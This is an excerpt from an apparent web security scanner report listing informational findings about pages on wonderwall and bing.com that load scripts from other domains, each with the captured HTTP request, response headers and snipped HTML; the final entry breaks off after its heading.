<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.413. http://wonderwall.redacted/tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:48 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: MISS from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.414. http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:50 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.415. http://www.asp.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asp.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.asp.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11587
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Home: The Offic
...[SNIP]...
<link href="/rss/spotlight" type="application/rss+xml" rel="alternate" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.416. http://www.bing.com/shopping/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/content/search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 33458
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:49 GMT
Connection: close
Set-Cookie: JSESSIONID=701D1EF51F0C0EBBEFA7B584B767B7F3; Path=/shopping
Set-Cookie: _SS=SID=F7223D6786004ADAB84BB9BF5E3B5DE1; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c79fe60b3364d4636b00d1291b84352c7; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org
...[SNIP]...
</script>
   
       
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script src="http://adsyndication.redacted/delivery/getads.js"
   type="text/javascript">

   
</script>
...[SNIP]...

23.417. http://www.bing.com/shopping/healthy-cooking/r/151

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/healthy-cooking/r/151

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shopping/healthy-cooking/r/151 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51707
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:15 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:16 GMT
Connection: close
Set-Cookie: _SS=SID=C18100C403AB4700AAFD75B59C0FBDDD; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1c459af2715848119a7e3c09ded2dd85; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.418. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/valentines-day-gift-ideas/r/144

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shopping/valentines-day-gift-ideas/r/144 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38935
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:14 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:15 GMT
Connection: close
Set-Cookie: _SS=SID=4A7020392DCB444D8DB76BCC0389EA0B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c77d64d3a6dd04333923fcc4e923d301a; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.419. http://www.bing.com/travel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 80826
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:24 GMT
Connection: close
Set-Cookie: lbc=904; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-23es9dprqmhf2yz5b70uaphsurhm_VID-8s1eg7na0h4jyz617ujc5pm7spr_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:07:24 GMT; Path=/travel
Set-Cookie: JSESSIONID=32FADE2FA84EF5FA97AB9602B43221A4; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=1ABB65B487EE44FBB0D3AEF855DF1C31; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c995d1595d772411ea969529da0bbdb7f; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:24 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.420. http://www.bing.com/travel/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 46219
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:06 GMT
Connection: close
Set-Cookie: JSESSIONID=5831CBDBB8382C06716441670216A316; Path=/travel
Set-Cookie: _SS=SID=AD194B1D8163435D90F9C42BAACCA3C7; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2b67e617c3464e858cbe39668b3c119f; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/


                                                                                                                                   
...[SNIP]...
</script>
   
       
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script src="http://adsyndication.redacted/delivery/getads.js"
   type="text/javascript">

   
</script>
...[SNIP]...

23.421. http://www.bing.com/videos/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=209
Content-Length: 163581
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:55:47 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:17 GMT
Connection: close
Set-Cookie: _SS=SID=26F1F5B07F29471397B72F751ED12FC6; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca859de7a417244f7a8cf721946885460; expires=Mon, 28-Jan-2013 23:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:17 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.422. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 69772
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:26 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:26 GMT
Connection: close
Set-Cookie: _SS=SID=AD764BCD76884B30A752348A7C436D27; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea69017aa2940ddbc58f461fcf7f67e; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.423. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 73776
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:16:20 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:20 GMT
Connection: close
Set-Cookie: _SS=SID=82E68AF887F9462D85273268B2AD8683; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:20 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c72c1860541c646f2a3cddecb5eb5aa15; expires=Tue, 29-Jan-2013 17:01:20 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:20 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.424. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 69364
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:33 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:33 GMT
Connection: close
Set-Cookie: _SS=SID=05091685D9CF4B10AA86045E50531C30; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c821edda8870d484ea116ec82b5b3c873; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.425. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 76002
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.109 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:43 GMT
Connection: close
Set-Cookie: _SS=SID=5BD6D1FA28554728966DF10884F75376; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:43 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8b2b3bcdf6bf491eb2c87f28bb9624a1; expires=Tue, 29-Jan-2013 17:00:43 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:43 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.426. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Summary

